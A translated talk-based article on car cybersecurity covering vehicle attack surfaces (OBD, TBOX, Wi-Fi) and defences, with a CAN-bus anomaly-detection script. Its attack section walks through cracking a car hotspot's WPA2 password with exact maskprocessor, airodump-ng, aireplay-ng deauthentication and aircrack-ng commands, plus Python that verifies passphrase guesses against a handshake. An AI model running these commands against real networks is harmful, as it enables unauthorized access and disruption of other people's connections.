This article is taken from Liu Pan's GitChat talk "360° Anatomy of How Hackers Break into Your Car". Click "Read the article" to see the questions readers exchanged with the author.


Edit | whalen

Preface

The automobile is regarded as the next intelligent terminal after the mobile phone. It is undeniable that the shift from the PC to the mobile phone changed the information age and moved us from the Internet to the mobile Internet; the dominant products and companies shifted likewise, from Microsoft and Intel in the PC era to Google and Apple in the mobile era.

I am waiting to see what the next era will be and who will dominate its defining product. No one doubts that the future will be an era of the interconnection of all things, and within that ecosystem the automobile is regarded as the next intelligent terminal that will change human life.

Many of the world's most creative and well-resourced companies are racing to bring such vehicles to market, and there is good reason to believe that the economic and social gains will be enormous. But any change in technology brings new challenges and risks alongside the benefits.

One of the biggest threats to transportation is vehicle cybersecurity: Internet connectivity, user authentication, smart devices and their circuitry now make up a large part of the new generation of vehicles.

But unlike an IT department, where operating system changes, adjustments and new tools can be rolled out and problems handled in real time, in the automotive world the software has already left the production line and the users are already on the road.

By contrast, the pace of change in the automotive industry remains slow, and this has significant implications both for identifying security vulnerabilities and for the measures needed to fix them.

I. The current state of vehicle cybersecurity

Last year, two white-hat hackers remotely took control of a Jeep Cherokee. This "incident" demonstrated a potential hazard rather than causing actual damage, but Chrysler subsequently recalled 1.4 million vehicles.

This year, researchers at Europe's largest motoring club (ADAC) demonstrated that the keyless "comfort access" locking systems now widespread on the market are no obstacle to technically savvy thieves.

Across vehicles from manufacturers including Volkswagen, Alfa Romeo, Chevrolet, Ford, Lancia, Opel, Peugeot and Renault, cheap and easy-to-use hardware can bypass the locking mechanism of an entire model range.

One of the core challenges of vehicle cybersecurity is that the vehicle's many ECUs are connected through an internal network. If an attacker manages to gain access to a peripheral ECU that is exposed to external tools (such as the Bluetooth or infotainment system), they can pivot to critical ECUs such as the brakes or the engine and wreak havoc.

Today's cars have more than 100 ECUs running over 100 million lines of code, which is a huge attack surface. The difficulty is compounded by the fact that automakers obtain ECUs from many different suppliers, so no single party, not even the automaker, controls or is even familiar with all of the vehicle's source code.

II. The vehicle's attack surface

More and more cars are electrified and connected, which means there are more and more points from which to attack them. As shown in the figure above, many of these points are the "premium" functions that new-energy vehicles offer over traditional cars, such as remote control from a mobile phone and remote monitoring from the cloud.

The communication and infotainment systems are particularly exposed: they can be reverse-engineered to reach the API libraries that share data between systems. From there an attacker can inject malicious messages into the Electronic Control Units (ECUs) and the Controller Area Network (CAN) bus that control critical systems such as electric power steering and braking.

The OBD port is the interface manufacturers use to read diagnostic data from the vehicle. It is wired to the CAN buses that connect the ECUs, so through the OBD connector an attacker can reach other devices on the vehicle, such as the wipers and the air conditioning.

Many start-ups build vehicle-control products around OBD dongles, although the market response so far has been lukewarm, and some companies are even building automated-driving solutions on top of this interface.

All in all, OBD is the easiest interface through which to control a car. Secondly, the connectivity modules are also a focus of attackers. For a car, modules such as Wi-Fi, Bluetooth and USB carry the risk of getting too "intimate" with whatever device is connected to the vehicle. Once the traffic is captured, it can be decoded and analysed, and the manufacturer's protocol reverse-engineered in order to operate and control the vehicle.

Finally, I will focus on the vehicle's networking equipment, which is its most vulnerable aspect. Networking in a traditional car is provided by the TBOX (telematics box), comparable to a network card in a PC: plug it in and the car can go online.

This peripheral talks to the TSP (telematics service provider) server over a defined protocol to send and receive data, and it is full of "harvest" surprises for attackers. The diagram below illustrates how each ECU is controlled through the TBOX.

Many of the links to the TSP server can be cracked. The mobile app, the web browser and even the phone that controls the car can all serve as entry points. Cracking the connected car is relatively easy compared with today's PC and mobile Internet, because the car is a product with a slow development and update cycle; many automakers' servers do not even offer secure encryption algorithms.

Network attack is of course only one step in breaking into a car. What sets the car apart from a PC or a phone is that it is a highly integrated product containing ECUs from many different vendors, and every parts supplier or OEM has its own set of vehicle protocols that are not public. This is the biggest barrier for an attacker, and also the car's strongest layer of protection, although obscurity only raises the cost: a proprietary protocol can still be reverse-engineered from captured bus traffic, as described above.

III. Vehicle security strategy

Security is a relative concept, a contest between spear and shield. There is no absolute security, and in theory every protective measure can be cracked. Here I introduce, from several angles, the security measures that apply before the car ships and even after it is on the road.

The first is security in the software development stage. This includes static analysis, for which companies can use tools such as Coverity to check the code for vulnerabilities effectively. Second, test the code before release: simulate and reproduce the intrusion techniques an attacker might use, so that vulnerabilities are blocked in the cradle. Finally, carry out penetration testing of the TrustZone implementation according to the supplier's plan.

In sum, every company's solution is different. Here I use end-to-end development as an example of how cybersecurity starts with the components. The reason for adopting an end-to-end solution is to ensure the highest achievable level of security at all times.

Think about cybersecurity from day one of product development so that potential security vulnerabilities do not appear in the first place. Consider not only the initial development but the entire product life cycle.

For example, the CAN bus traffic can be checked continuously for anomalies, and the communication between all control units can be authenticated and encrypted. Permanently monitoring the current state of the vehicle's systems and reporting regularly to a security centre adds further safety: the results reveal security holes across the fleet, so that security patches can be developed quickly and delivered via OTA updates, eliminating the need for a visit to the service centre.

To sum up, cybersecurity can be addressed from five aspects:

  1. Encryption of the data interfaces

  2. Monitoring and protection of the in-vehicle network bus

  3. Vehicle health data monitoring

  4. Hardware protection with security modules such as TrustZone

  5. Protection of data transmission to, and processing on, the cloud server
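As an added example of the "check the CAN bus continuously for anomalies" idea (this code is not from the article or from any vendor's product), the block below learns a per-ID baseline from a known-clean recording in candump log format and then flags three common deviations on a second recording: an arbitration ID never seen before, a payload length (DLC) that differs from normal, and a periodic ID arriving far faster than its period, which is the signature of an attacker flooding spoofed frames to out-vote the legitimate ECU. All frames, IDs and timings are constructed for the example; the 10 ms / 20 ms messages and the 0x7DF diagnostic-request ID are assumptions, not data from any real vehicle.

```python
"""Baseline-and-deviation anomaly detection over CAN traffic (candump log format).

Added example, not from the original article. Lines look like
"(timestamp) interface ID#DATA"; every frame below is constructed.
"""
import re
from collections import defaultdict
from statistics import median

CANDUMP_RE = re.compile(
    r"^\((?P<ts>\d+\.\d+)\)\s+(?P<iface>\S+)\s+(?P<id>[0-9A-Fa-f]{3,8})#(?P<data>[0-9A-Fa-f]*)$"
)


def parse_candump_line(line):
    """Return (timestamp, arbitration id, payload bytes) for one candump line."""
    m = CANDUMP_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a candump line: {line!r}")
    payload = bytes.fromhex(m["data"]) if m["data"] else b""
    return float(m["ts"]), int(m["id"], 16), payload


def frames_from(lines):
    """Parse and time-order a list of log lines."""
    return sorted(parse_candump_line(ln) for ln in lines)


def learn_baseline(frames):
    """Per arbitration ID, learn the median inter-arrival period and the set
    of payload lengths observed on a known-clean recording."""
    last, periods, dlcs = {}, defaultdict(list), defaultdict(set)
    for ts, can_id, payload in frames:
        dlcs[can_id].add(len(payload))
        if can_id in last:
            periods[can_id].append(ts - last[can_id])
        last[can_id] = ts
    return {cid: {"period": median(periods[cid]) if periods[cid] else None,
                  "dlcs": dlcs[cid]} for cid in dlcs}


def detect(frames, baseline, burst_ratio=0.5):
    """Return (ts, kind, id) alerts for frames that deviate from the baseline:
    unknown_id       - ID never seen in the clean recording
    dlc_mismatch     - payload length this ID does not normally carry
    injection_burst  - periodic ID arriving faster than burst_ratio * period
    """
    alerts, last = [], {}
    for ts, can_id, payload in frames:
        profile = baseline.get(can_id)
        if profile is None:
            alerts.append((ts, "unknown_id", can_id))
            continue
        if len(payload) not in profile["dlcs"]:
            alerts.append((ts, "dlc_mismatch", can_id))
        if can_id in last and profile["period"]:
            if ts - last[can_id] < profile["period"] * burst_ratio:
                alerts.append((ts, "injection_burst", can_id))
        last[can_id] = ts
    return alerts


def _periodic(can_id, data_hex, start, period, count):
    """Generate constructed candump lines for one periodic message."""
    return [f"({start + i * period:.6f}) can0 {can_id:03X}#{data_hex}"
            for i in range(count)]


# Constructed clean recording: a 10 ms message and a 20 ms message.
CLEAN_LOG = (_periodic(0x0C4, "0000000000000000", 1000.0, 0.010, 50)
             + _periodic(0x1A0, "0A0B0C0D", 1000.005, 0.020, 25))

# Constructed attack recording: the legitimate 0x0C4 stream continues, an
# attacker injects ten spoofed 0x0C4 frames 1 ms apart, and a diagnostic
# request ID (0x7DF) appears that was never in the clean recording.
ATTACK_LOG = (_periodic(0x0C4, "0000000000000000", 2000.0, 0.010, 20)
              + _periodic(0x0C4, "FFFF000000000000", 2000.1005, 0.001, 10)
              + ["(2000.050000) can0 7DF#0201000000000000"])


def run_example():
    """Learn from CLEAN_LOG, then scan ATTACK_LOG; returns the alert list."""
    baseline = learn_baseline(frames_from(CLEAN_LOG))
    return detect(frames_from(ATTACK_LOG), baseline)


if __name__ == "__main__":
    for ts, kind, cid in run_example():
        print(f"{ts:.4f}  {kind:16s}  0x{cid:03X}")
```

In a real deployment the baseline would be learned per vehicle variant and firmware version, since legitimate message sets and periods differ between them, and the alerts would be the input to the "report to the security centre" step rather than the end of the story.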

IV. How hackers attack your car

Taking the TBOX as the example of how to get at the TSP connection: the car's Wi-Fi hotspot is usually the weak point, because Wi-Fi signals can be seen everywhere. Many routers and hotspots contain vulnerabilities that can be exploited easily with the right equipment and software, such as the tools shipped with Kali Linux. Start with Wireshark, a tool for capturing, filtering and examining network packets.

Wireshark, formerly known as Ethereal, is a network analysis tool that captures packets in real time and displays them in a human-readable format. It includes filters, colour coding and other features that give insight into network traffic and let you examine individual packets.

After downloading and installing Wireshark, start it and double-click an interface name under Capture to capture packets on that interface. For example, to capture traffic on a wireless network, click the Wi-Fi interface. Advanced options are available under Capture > Options, but you do not need them now.

Once you click the interface name, packets start to appear in real time. Wireshark captures every packet sent to or from your system.

With promiscuous mode enabled, which it is by default, it also shows the other packets the adapter sees on the network, not just those addressed to it. One caveat for Wi-Fi: promiscuous mode on an ordinary managed interface does not show other stations' traffic; that requires monitor mode, and on a WPA2 network the frames you then see remain encrypted until you hold the pre-shared key and that station's four-way handshake.

To check whether promiscuous mode is enabled, click Capture > Options and verify that the "Enable promiscuous mode on all interfaces" check box at the bottom of the window is ticked.

Click a packet to select it, then expand it to see its details.

The packet selected in the figure is addressed to the TSP server; its header fields and payload can be seen. The next step is to use cracking tools on the Wi-Fi network itself.

The first step is to create a list of all possible eight-character passwords made of uppercase letters, using maskprocessor from Kali Linux.

We then deauthenticate a client connected to the access point with aireplay-ng, capture the resulting four-way handshake with airodump-ng, and finally brute-force the password against the handshake with aircrack-ng.

  1. Use maskprocessor to generate the password list, split into one file per first letter so that several computers can share the brute-force work. ?u stands for one uppercase letter, so a fixed letter followed by seven ?u gives eight characters:

    maskprocessor -o /usr/A.txt A?u?u?u?u?u?u?u

    maskprocessor -o /usr/B.txt B?u?u?u?u?u?u?u

    maskprocessor -o /usr/C.txt C?u?u?u?u?u?u?u

    And so on for each letter of the alphabet. Each file holds 26^7 (about 8 billion) candidates of eight characters plus a newline, so roughly 70 GB per file. If disk space is the constraint, aircrack-ng can also read candidates from standard input (-w -), so maskprocessor can be piped straight into it without writing the lists out at all.

  2. Next, capture the handshake with airodump-ng. First use airodump-ng to pick the target and note its BSSID and channel.

    Then use aireplay-ng to deauthenticate a connected client and force it to reconnect, which gives us the four-way handshake we need. With the card already in monitor mode (the interface is wlan0mon here; older airmon-ng versions name it mon0), start airodump-ng and find the target:

    $ airodump-ng wlan0mon

    Now select your target's BSSID and channel, restart airodump-ng locked to that network and writing the capture to a file, and look for connected clients:

    $ airodump-ng --bssid [BSSID] -c [channel] -w [capture file prefix] wlan0mon

    Open a new terminal and send two deauthentication frames to the connected client with aireplay-ng:

    $ aireplay-ng -0 2 -a [BSSID] -c [client MAC] wlan0mon

    When the deauthentication succeeds and the client reconnects, airodump-ng shows "WPA handshake" in its header: the four-way handshake has been captured.

  3. Finally, brute-force the password with aircrack-ng (-a 2 selects WPA/WPA2-PSK):

    $ aircrack-ng -a 2 -b [router BSSID] -w [path to password list] [path to .cap file]

    Given enough time, and provided the real password lies within the generated keyspace, aircrack-ng reports the recovered password as "KEY FOUND!".
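To make clear what aircrack-ng is actually doing for each of those 26^8 candidates, and why each guess is expensive, here is an added example (not from the article and not aircrack-ng's code) that performs the same offline check in pure Python: derive the PMK from the passphrase with PBKDF2, expand it to the PTK, recompute the MIC over EAPOL message 2 and compare with the captured one. Because no real capture can be shipped with the text, the SSID, BSSID, client MAC, nonces, the minimal EAPOL-Key frame and the eight-letter passphrase are all constructed here; the mask helper mirrors the ?u syntax used above so the keyspace numbers can be checked.

```python
"""Offline WPA2-PSK candidate verification against a captured four-way handshake.

Added example, not from the original article or from aircrack-ng. It performs
the per-candidate check aircrack-ng does: passphrase -> PMK -> PTK -> MIC over
EAPOL message 2, compare with the captured MIC. The "capture" is constructed.
"""
import hashlib
import hmac
import itertools
import string

PBKDF2_ITERATIONS = 4096   # fixed by the WPA2-PSK standard; this is the per-guess cost
MIC_OFFSET = 81            # offset of the Key MIC field in an EAPOL-Key frame


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """IEEE 802.11 PRF-512 -> 64-byte PTK; its first 16 bytes are the KCK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    label = b"Pairwise key expansion"
    out = b"".join(hmac.new(pmk, label + b"\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return out[:64]


def eapol_mic(kck, eapol_frame):
    """WPA2 (descriptor version 2): HMAC-SHA1 over the frame with MIC zeroed, 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce):
    """Minimal EAPOL-Key message 2 with the MIC field zeroed (constructed layout)."""
    body = (b"\x02"                    # descriptor type: RSN
            + b"\x01\x0a"              # key info: version 2, pairwise, MIC bit set
            + b"\x00\x10"              # key length
            + (1).to_bytes(8, "big")   # replay counter
            + snonce                   # 32-byte SNonce
            + b"\x00" * 16             # key IV
            + b"\x00" * 8              # key RSC
            + b"\x00" * 8              # key ID
            + b"\x00" * 16             # key MIC, filled in by the station
            + b"\x00\x00")             # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X header


# Constructed network parameters standing in for a captured handshake.
SSID = "CAR-HOTSPOT"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "HGRTQWXK"   # eight uppercase letters, the keyspace from the mask above


def make_handshake(passphrase):
    """Simulate the station (which knows the PSK) emitting a valid message 2."""
    frame = build_eapol_msg2(SNONCE)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID),
                       AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


CAPTURED_MSG2 = make_handshake(TRUE_PASSPHRASE)


def check_candidate(passphrase, ssid, ap_mac, sta_mac, anonce, eapol_msg2):
    """True if the candidate reproduces the MIC carried in the captured message 2."""
    snonce = eapol_msg2[17:49]   # SNonce follows the 8-byte replay counter
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                       ap_mac, sta_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, eapol_msg2),
                               eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16])


def mask_slots(mask):
    """Expand a maskprocessor-style mask: ?u/?l/?d are charsets, other chars are literal."""
    charsets = {"u": string.ascii_uppercase, "l": string.ascii_lowercase, "d": string.digits}
    slots, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask) and mask[i + 1] in charsets:
            slots.append(charsets[mask[i + 1]])
            i += 2
        else:
            slots.append(mask[i])
            i += 1
    return slots


def keyspace(mask):
    """Number of candidates the mask expands to (26**7 for A?u?u?u?u?u?u?u)."""
    size = 1
    for slot in mask_slots(mask):
        size *= len(slot)
    return size


def mask_candidates(mask):
    """Lazily generate every candidate the mask describes."""
    return ("".join(p) for p in itertools.product(*mask_slots(mask)))


def crack(candidates, ssid=SSID, ap_mac=AP_MAC, sta_mac=STA_MAC,
          anonce=ANONCE, eapol_msg2=CAPTURED_MSG2):
    """Return the first candidate that validates against the handshake, else None."""
    for cand in candidates:
        if check_candidate(cand, ssid, ap_mac, sta_mac, anonce, eapol_msg2):
            return cand
    return None


if __name__ == "__main__":
    print("full mask keyspace:", keyspace("?u" * 8))
    print("recovered:", crack(mask_candidates("HGRTQWX?u")))
```

Two practical points follow from the code. Each guess costs 4096 HMAC-SHA1 rounds, so even a GPU doing several hundred thousand PBKDF2 derivations per second needs weeks for 26^8 candidates; a passphrase drawn from a larger character set and length pushes this out of reach, which is exactly why a hotspot PSK should not be eight uppercase letters. And the check needs only the SSID, both MACs, both nonces and one MIC-protected message, which is why a single deauthenticated client reconnecting is enough for the attacker.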
